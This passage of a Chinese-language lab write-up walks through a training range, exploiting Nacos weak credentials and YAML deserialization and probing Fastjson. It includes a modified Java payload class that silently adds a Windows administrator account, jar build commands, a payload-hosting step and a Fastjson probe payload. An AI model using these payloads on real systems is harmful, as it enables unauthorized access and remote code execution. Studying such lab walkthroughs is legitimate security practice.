<h1 id="flag02-Nacos-Client-Yaml-Deserialization"><a href="#flag02-Nacos-Client-Yaml-Deserialization" class="headerlink" title="flag02(Nacos Client Yaml Deserialization)"></a>flag02(Nacos Client Yaml Deserialization)</h1><p>我们先访问 Nacos 服务：<a target="_blank" rel="noopener" href="http://172.30.12.6:8848/">http://172.30.12.6:8848</a></p>
<p>反手一个弱口令进入后台<code>nacos:nacos</code>，获取到的配置文件内容如下</p>
<div class="highlight-wrap" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line">server:</span><br><span class="line">  port: 8080</span><br><span class="line">  servlet:</span><br><span class="line">    context-path: /hello</span><br><span class="line"></span><br><span class="line">spring:</span><br><span class="line">  application:</span><br><span class="line">    name: db-config</span><br><span class="line">  cloud:</span><br><span class="line">    nacos:</span><br><span class="line">      discovery:</span><br><span class="line">        server-addr: 127.0.0.1:8848</span><br><span class="line">      config:</span><br><span class="line">        server-addr: 127.0.0.1:8848</span><br><span class="line">        file-extension: yaml</span><br><span class="line">        namespace: dev</span><br><span class="line">        group: DEFAULT_GROUP</span><br><span class="line">        data-id: db-config.yaml</span><br><span class="line">  datasource:</span><br><span class="line">    mysql:</span><br><span class="line">      url: jdbc:mysql://localhost:3306/test?useSSL=<span class="literal">false</span>&amp;serverTimezone=UTC&amp;allowPublicKeyRetrieval=<span class="literal">true</span></span><br><span class="line">      username: root</span><br><span class="line">      password: P@ssWord!!!</span><br><span class="line">  redis:</span><br><span class="line">    host: localhost</span><br><span class="line">    port: 6379</span><br><span class="line"></span><br><span class="line">management:</span><br><span class="line">  endpoints:</span><br><span class="line">    web:</span><br><span class="line">      exposure:</span><br><span class="line">        include: <span class="string">&#x27;*&#x27;</span></span><br></pre></td></tr></table></figure></div>

<p>我们用<a target="_blank" rel="noopener" href="https://github.com/charonlight/NacosExploitGUI">charonlight&#x2F;NacosExploitGUI</a>工具检测一下存在的漏洞</p>
<p><img src="https://pic1.zhimg.com/80/v2-9ea20a54f5d52282327122f93829e96d_1440w.png"></p>
<p>根据检测结果我们尝试<code>Nacos Client Yaml</code>反序列化漏洞，修改<a target="_blank" rel="noopener" href="https://github.com/artsploit/yaml-payload">artsploit&#x2F;yaml-payload</a>制作一个恶意包</p>
<p>只需要修改<code>AwesomeScriptEngineFactory.java</code>文件中的内容即可，我们直接添加一个管理员账户：</p>
<div class="highlight-wrap" data-rel="Java"><figure class="iseeu highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//Admin123..(原本的密码)</span></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">AwesomeScriptEngineFactory</span> <span class="keyword">implements</span> <span class="title class_">ScriptEngineFactory</span> &#123;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="title function_">AwesomeScriptEngineFactory</span><span class="params">()</span> &#123;</span><br><span class="line">        <span class="keyword">try</span> &#123;</span><br><span class="line">            Runtime.getRuntime().exec(<span class="string">&quot;net user fmo fmo /add&quot;</span>);</span><br><span class="line">            Runtime.getRuntime().exec(<span class="string">&quot;net localgroup administrators fmo /add&quot;</span>);</span><br><span class="line">        &#125; <span class="keyword">catch</span> (IOException e) &#123;</span><br><span class="line">            e.printStackTrace();</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure></div>

<p>然后我们将上面的源代码编译为jar包</p>
<div class="highlight-wrap" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">D:\PenetrationW\script\yaml-payload&gt;D:\ProgrammingLanguage\java\jdk8-8u421\bin\javac -version</span><br><span class="line">javac 1.8.0_421</span><br><span class="line"></span><br><span class="line">D:\PenetrationW\script\yaml-payload&gt;D:\ProgrammingLanguage\java\jdk8-8u421\bin\javac src/artsploit/AwesomeScriptEngineFactory.java</span><br><span class="line"></span><br><span class="line">D:\PenetrationW\script\yaml-payload&gt;D:\ProgrammingLanguage\java\jdk8-8u421\bin\jar -cvf yaml-payload.jar -C src/ .</span><br><span class="line">已添加清单</span><br><span class="line">正在添加: artsploit/(输入 = 0) (输出 = 0)(存储了 0%)</span><br><span class="line">正在添加: artsploit/AwesomeScriptEngineFactory.class(输入 = 1671) (输出 = 702)(压缩了 57%)</span><br><span class="line">正在添加: artsploit/AwesomeScriptEngineFactory.java(输入 = 1562) (输出 = 410)(压缩了 73%)</span><br><span class="line">正在忽略条目META-INF/</span><br><span class="line">正在添加: META-INF/services/(输入 = 0) (输出 = 0)(存储了 0%)</span><br><span class="line">正在添加: META-INF/services/javax.script.ScriptEngineFactory(输入 = 36) (输出 = 38)(压缩了 -5%)</span><br></pre></td></tr></table></figure></div>

<p>在当前目录发现新jar文件,上传到<code>Web01</code>入口机器中，然后起一个<code>Web服务</code>使之可以访问</p>
<div class="highlight-wrap" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#用root权限的web01</span></span><br><span class="line">python3 -m http.server 80</span><br></pre></td></tr></table></figure></div>

<p>另外Jar路径填内网地址(<a target="_blank" rel="noopener" href="http://172.30.12.5/payload.jar)%EF%BC%8C%E5%90%8C%E6%97%B6%E5%8F%AF%E4%BB%A5%E5%A4%9A%E6%89%A7%E8%A1%8C%E5%87%A0%E6%AC%A1%EF%BC%8C%E7%A1%AE%E4%BF%9D%E6%88%90%E5%8A%9F">http://172.30.12.5/payload.jar)，同时可以多执行几次，确保成功</a></p>
<p><img src="https://picx.zhimg.com/80/v2-a48b8d07ff144e60d000b01bd094fb15_1440w.png"></p>
<p>之后进行常规的远程桌面链接即可链接即可(不用管端口号)，最后在<code>Administrator</code>用户目录下发现 flag02(这台电脑是Windows)</p>
<h1 id="flag03-Fastjson-Deserialization"><a href="#flag03-Fastjson-Deserialization" class="headerlink" title="flag03(Fastjson Deserialization)"></a>flag03(Fastjson Deserialization)</h1><p>我们接着访问医院后台管理平台服务：<a target="_blank" rel="noopener" href="http://172.30.12.236:8080/">http://172.30.12.236:8080/</a></p>
<p>Burp抓取登录包发现发送的为<code>Json</code>数据，猜测为<code>Fastjson</code>，发送<code>Payload</code>后得到版本号<code>1.2.45</code></p>
<div class="highlight-wrap" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;<span class="string">&quot;@type&quot;</span>: <span class="string">&quot;java.lang.AutoCloseable&quot;</span></span><br></pre></td></tr></table></figure></div>
<p><img src="https://picx.zhimg.com/80/v2-44c107056a9635991378458ee1aacdec_1440w.png"></p>
<p>172.30.12.236:8080是打Fastjson反序列化，这里直接用现成的burp插件<a target="_blank" rel="noopener" href="https://github.com/amaz1ngday/fastjson-exp">amaz1ngday&#x2F;fastjson-exp</a>，抓登录的请求包，然后选择操作，再选择拓展，无论是send to fastjsonEcho还是send to fastjsonInject插件都能检验出来然后帮你拿shell<br><img src="https://pic1.zhimg.com/80/v2-91cbdaf95d7ace371d6c5d4447b8db80_1440w.png"><br>不过生成的马连不上，会显示initShellOpertion Fail，因为目标开启了session持久化，并且我们向session存入了不可被反序列化的数据，导致后续使用此session我们无法获取到之前存入的数据，解决办法是把生成的shell中的session替换成application，但他这个请求我没怎么看懂，改不来。但这个插件可以直接在消息请求头那里执行命令然后拿到执行结果，所以也不用连上去<br><img src="https://picx.zhimg.com/80/v2-5d471999ae7cd187f262711e8324c01f_1440w.png"></p>
<p>因为我想改密码，输入了命令<code>passwd</code>，导致web03靶机连接不了了，也不能getshell了，后面的部分也就打不了了，害，太可惜了，希望以后能补回来</p>
<h1 id="flag04-Grafana-Unauthorized-Arbitrary-File-Reading-PostgreSQL-Getshell"><a href="#flag04-Grafana-Unauthorized-Arbitrary-File-Reading-PostgreSQL-Getshell" class="headerlink" title="flag04(Grafana Unauthorized Arbitrary File Reading &amp; PostgreSQL Getshell)"></a>flag04(Grafana Unauthorized Arbitrary File Reading &amp; PostgreSQL Getshell)</h1><p>好像是多次代理的玩意</p>
<h1 id="参考链接"><a href="#参考链接" class="headerlink" title="参考链接"></a>参考链接</h1><p><a target="_blank" rel="noopener" href="https://lca.xlog.app/chun-qiu-yun-jing-fang-zhen-ba-chang-Hospital-shi-cao?locale=zh">春秋云镜仿真靶场Hospital实操</a><br><a target="_blank" rel="noopener" href="https://fushuling.com/index.php/2024/01/06/%E6%98%A5%E7%A7%8B%E4%BA%91%E5%A2%83-hospital/">春秋云境-Hospital</a><br><a target="_blank" rel="noopener" href="https://5ime.cn/yunjing-hospital.html">春秋云镜 Hospital Writeup</a></p>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
        
          <li><a href="/">Home</a></li>
        
          <li><a href="/about/">About</a></li>
        
          <li><a href="/archives/">Writing</a></li>
        
          <li><a href="/link/">Link</a></li>
        
          <li><a href="/search/">Search</a></li>
        
      </ul>
    </div>

    
    
      <div id="toc-footer" style="display: none">
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%A6%82%E8%BF%B0"><span class="toc-number">1.</span> <span class="toc-text">概述</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%89%8D%E6%9C%9F%E4%BF%A1%E6%81%AF%E6%89%93%E7%82%B9"><span class="toc-number">2.</span> <span class="toc-text">前期信息打点</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8-Spring-Boot-Heapdump-Shiro-Deserialization"><span class="toc-number">3.</span> <span class="toc-text">漏洞利用(Spring Boot Heapdump + Shiro Deserialization)</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E9%9D%9E%E9%A2%84%E6%9C%9F-%E7%8C%9Cflag%E5%9C%B0%E5%9D%80"><span class="toc-number">3.1.</span> <span class="toc-text">非预期(猜flag地址)</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%80%E6%AC%A1%E6%80%A7%E6%8F%90%E6%9D%83%EF%BC%8C%E4%B8%8D%E5%A5%BD%E7%94%A8"><span class="toc-number">3.2.</span> <span class="toc-text">一次性提权，不好用</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%AD%A3%E5%AE%97%E6%8F%90%E6%9D%83%E6%96%B9%E6%B3%95-%E5%8D%87%E7%BA%A7%E4%BA%A4%E4%BA%92%E5%BC%8F%E7%BB%88%E7%AB%AF"><span class="toc-number">3.3.</span> <span class="toc-text">正宗提权方法(升级交互式终端)</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%86%85%E7%BD%91%E6%89%AB%E6%8F%8F"><span class="toc-number">4.</span> <span class="toc-text">内网扫描</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#flag02-Nacos-Client-Yaml-Deserialization"><span class="toc-number">5.</span> <span class="toc-text">flag02(Nacos Client Yaml Deserialization)</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#flag03-Fastjson-Deserialization"><span class="toc-number">6.</span> <span class="toc-text">flag03(Fastjson Deserialization)</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#flag04-Grafana-Unauthorized-Arbitrary-File-Reading-PostgreSQL-Getshell"><span class="toc-number">7.</span> <span class="toc-text">flag04(Grafana Unauthorized Arbitrary File Reading &amp; PostgreSQL Getshell)</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%8F%82%E8%80%83%E9%93%BE%E6%8E%A5"><span class="toc-number">8.</span> <span class="toc-text">参考链接</span></a></li></ol>
      </div>
    

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://chimedal.github.io/2024/09/30/Hospital/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://chimedal.github.io/2024/09/30/Hospital/&text=春秋云境-Hospital"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://chimedal.github.io/2024/09/30/Hospital/&title=春秋云境-Hospital"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://chimedal.github.io/2024/09/30/Hospital/&is_video=false&description=春秋云境-Hospital"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=春秋云境-Hospital&body=Check out this article: https://chimedal.github.io/2024/09/30/Hospital/"><i class="fa-solid fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://chimedal.github.io/2024/09/30/Hospital/&title=春秋云境-Hospital"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://chimedal.github.io/2024/09/30/Hospital/&title=春秋云境-Hospital"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://chimedal.github.io/2024/09/30/Hospital/&title=春秋云境-Hospital"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://chimedal.github.io/2024/09/30/Hospital/&title=春秋云境-Hospital"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://chimedal.github.io/2024/09/30/Hospital/&name=春秋云境-Hospital&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://chimedal.github.io/2024/09/30/Hospital/&t=春秋云境-Hospital"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fa-solid fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        
          <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fa-solid fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fa-solid fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2016-2025
    Chimedal
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     --><!--
       --><li><a href="/link/">Link</a></li><!--
     --><!--
       --><li><a href="/search/">Search</a></li><!--
     -->
      </ul>
      <ul>
        
          <!-- 不蒜子统计 -->
          <span id="busuanzi_container_site_pv">
              本站总访问量<span id="busuanzi_value_site_pv"></span>次
          </span>
          <span class="post-meta-divider">|</span>
          <span id="busuanzi_container_site_uv" style='display:none'>
                  本站访客数<span id="busuanzi_value_site_uv"></span>人
          </span>
        <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
        
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->

  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script>




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script>
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="fa-regular fa-clone"></i>';
    btn += '</span>';
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Disqus Comments -->

<!-- utterances Comments -->

</body>
</html>
